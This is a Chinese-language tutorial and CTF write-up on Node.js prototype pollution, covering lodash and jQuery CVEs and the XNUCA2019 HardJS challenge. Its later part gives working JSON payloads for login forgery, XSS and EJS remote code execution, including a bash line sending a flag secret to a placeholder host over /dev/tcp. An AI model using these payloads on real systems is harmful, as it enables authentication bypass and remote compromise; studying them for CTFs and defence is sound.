node.js原型链污染漏洞

node.js入门:http://nodejs.cn/learn/how-much-javascript-do-you-need-to-know-to-use-nodejs
根据上面说明要掌握的JavaScript部分直接看菜鸟教程学。

对象与原型链

JavaScript当中的所有事物都是对象:字符串、数值、数组、函数。对象只是一种特殊的数据。对象拥有属性和方法。
可以这样创建一个对象

var person = {firstName:"John", lastName:"Doe", age:50, eyeColor:"blue"};

JavaScript 对象就是一个 name:value 集合。而对象的的属性就是以键值的的形式表现。
可以通过两种方式访问对象属性

person.lastName;
person["lastName"];

第二种方式类似于python当中的字典或者php的关联数组,那么能够控制数组(对象)的“键名”的操作就能设置对象的属性值了,这也是漏洞的成因之一。
类是对象的抽象,对象是类的实例。JavaScript当中使用定义一个构造函数的形式实现类这个概念。

function Person(first, last) { 
this.firstName = first;
this.lastName = last; }

当然也支持像Java的class形式定义(本质是一个语法糖)
类中包含了一个特殊的方法 constructor(),它是类的构造函数,这种方法用于创建和初始化一个由 class 创建的对象。
而在JavaScript当中的对象都会从一个类中的 prototype(原型对象)属性中继承属性和方法。对象的__proto__属性,指向类的原型对象prototype
node.js原型链污染漏洞_第1张图片node.js原型链污染漏洞_第2张图片

所有 JavaScript 中的对象都是位于原型链顶端的 Object 的实例。
JavaScript 对象有一个指向一个原型对象的链。当试图访问一个对象的属性时,它不仅仅在该对象上搜寻,还会搜寻该对象的原型,以及该对象的原型的原型,依次层层向上搜索,直到找到一个名字匹配的属性或到达原型链的末尾。
在这里插入图片描述

那么当原型存在该属性时,只要其子类实例没有定义该同名属性,就会直接继承这个属性,就如同姓氏一般。
而原型链污染即是通过修改一个对象的原型,从而影响所有同类、子类以及父祖类的对象。相当于是穿越回去把这个姓氏的祖宗姓名改了。
node.js原型链污染漏洞_第3张图片

要修改原型的属性即控制数组键值对的操作,常见有merge、clone(将待操作的对象merge到一个空对象)。
node.js原型链污染漏洞_第4张图片

__proto__当作key写入,尝试污染失败。在对象的创建过程中__proto__已经被解析为其原型,merge函数再遍历时得到的键名仅为为a,b。
node.js原型链污染漏洞_第5张图片node.js原型链污染漏洞_第6张图片

JSON 格式在语法上与创建 JavaScript 对象代码是相同的,在转化为JavaScript对象时,__proto__会被认为是个键名,而不是直接解析为原型,从而保留这个键值对。
node.js原型链污染漏洞_第7张图片

Lodash 模块原型链污染

lodash.merge 方法

通过__proto__污染,就如同上面的列子一样。这里的 if 判断可以绕过,最终进入 object [key] = value 的赋值操作。
node.js原型链污染漏洞_第8张图片

var lodash= require('lodash');
var payload = '{"__proto__":{"whoami":"Vulnerable"}}';
var a = {};
console.log("Before whoami: " + a.whoami);
lodash.merge({}, JSON.parse(payload));
console.log("After whoami: " + a.whoami);

lodash.defaultsDeep 方法

(CVE-2019-10744)Lodash 库中的 defaultsDeep 函数可能会被包含 constructor 的 Payload 诱骗添加或修改 Object.prototype
a.constructor返回创建实例对象的 Object 构造函数的引用,我感觉相当于是这个对象的原型类,然后修改其prototype属性
node.js原型链污染漏洞_第9张图片

const mergeFn = require('lodash').defaultsDeep;
const payload = '{"constructor": {"prototype": {"whoami": "Vulnerable"}}}'
function check() {
    mergeFn({}, JSON.parse(payload));
        if (({})[`a0`] === true) {
                console.log(`Vulnerable to Prototype Pollution via ${payload}`);
                    }
                }
check();

payload:{“type”:“test”,“content”:{“prototype”:{“constructor”:{“a”:“b”}}}}

jQuery CVE-2019-11358 原型污染漏洞

jQuery CVE-2019-11358 原型污染漏洞分析和修复建议
版本小于3.4.0时

$.extend(true,{},JSON.parse('{"__proto__":{"aa":"hello"}}')) 

Jquery可以用$.extend将两个字典merge

题目实列[XNUCA2019Qualifier]HardJS

关键词:nodejs lodash原型链污染
服务器是nodejs,并且用了express这个框架,模板渲染引擎则用了ejs。

sudo curl -fsSL https://deb.nodesource.com/setup_17.x |sudo bash -
apt-get install -y nodejs
npm install && npm audit

可以看到依赖项lodash存在原型链污染漏洞,即CVE-2019-10744.
node.js原型链污染漏洞_第10张图片

从robots.py当中可见,admin的密码即为flag。

1. 后端的原型链污染漏洞

server.js当中的/get路由可见,当消息数量大于5时将会调用lodash.defaultsDeep来合并消息。
node.js原型链污染漏洞_第11张图片

express框架支持根据Content-Type来解析请求Body,那么将payload发送6次然后访问 /get 即可触发原型链污染
预期解是绕过登录验证越权登录admin,覆盖login与userid属性即可
node.js原型链污染漏洞_第12张图片

此时已经可以伪造登陆状态了

{"type":"test","content":{"constructor":{"prototype":{"login":true,"userid":1}}}}

除了/static,/login和/register以外,其他路由在访问的时候均须auth函数进行身份验证。
在robot.py当中robot会打开本地页面的首页/,通过上面的原型链污染即可跳过auth的302跳转,然后robot会根据form的name填写用户名和密码并提交。
那么下面就需要在前端打一个xss

2.前端的原型链污染漏洞

在app.js当中可见前端获取后台数据时,调用了$.extent函数merge数据
node.js原型链污染漏洞_第13张图片

在使用js生成模板时,遍历了hints对象并将hints对象的属性键值对写入到对应li标签中。
node.js原型链污染漏洞_第14张图片

index.ejs中,含有type属性的li标签除了上面写的五个还有一个logger
node.js原型链污染漏洞_第15张图片

通过污染原型的logger属性,即可覆盖logger的内容从而导致XSS

{"type":"test","content":{"__proto__": {"logger": ""}}}

vps上搞个模拟登录的html表单就行

利用ejs进行rce

除了像上面那样利用前后端组合攻击,也可仅利用后端漏洞利用ejs进行rce。
这里利用ejs 来渲染模版,那么从 res.render('index'); 开始分析
查看函数定义 /node_modules/express/lib/response.js
node.js原型链污染漏洞_第16张图片

跟进这个调用的函数定义/node_modules/express/lib/application.js
node.js原型链污染漏洞_第17张图片

继续跟进
node.js原型链污染漏洞_第18张图片

调用了engine,查看声明 默认引擎出口
node.js原型链污染漏洞_第19张图片

跟进这个__express的声明
node.js原型链污染漏洞_第20张图片

查看这个renderFile的实现
node.js原型链污染漏洞_第21张图片

最后调用了tryHandleCache函数
在这里插入图片描述

经过 handleCache 函数处理后返回最终的页面
在这里插入图片描述

handleCache返回了一个函数
node.js原型链污染漏洞_第22张图片node.js原型链污染漏洞_第23张图片

再跟进 compile 看到各种代码拼接
node.js原型链污染漏洞_第24张图片

后面是一个动态函数生成
node.js原型链污染漏洞_第25张图片

这个对象会与其他生成的模板字符串一起拼接到this.source,然后传递给src,接着是fn,然后以returnedFn返回并最后被执行

利用global.process 进行RCE反弹shell
node.js原型链污染漏洞_第26张图片

{"type":"test","content":{"constructor":{"prototype":
{"outputFunctionName":"a=1;process.mainModule.require('child_process').exec('b
ash -c \"echo $FLAG>/dev/tcp/xxxxx/xx\"')//"}}}}

或者直接回显flag到页面上

{"type":"111","content":{"constructor":{"prototype":{"outputFunctionName":"__append; return process.env.FLAG; __append"}}}}

node.js原型链污染漏洞_第27张图片node.js原型链污染漏洞_第28张图片node.js原型链污染漏洞_第29张图片

参考:

https://www.leavesongs.com/PENETRATION/javascript-prototype-pollution-attack.html
https://github.com/NeSE-Team/OurChallenges/tree/master/XNUCA2019Qualifier/Web/hardjs
https://blog.szfszf.top/tech/javascript-%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93-%E5%88%86%E6%9E%90/
https://www.wangan.com/p/7fygf7fa6b978b66#lodash.defaultsDeep%E6%96%B9%E6%B3%95%E9%80%A0%E6%88%90%E7%9A%84%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93%EF%BC%88CVE-2019-10744%EF%BC%89
https://www.anquanke.com/post/id/185377#h3-1
http://j0k3r.top/2019/09/10/js_prototype_pollution/#0x02-Hardjs

你可能感兴趣的:(node.js,javascript,原型模式,ctf)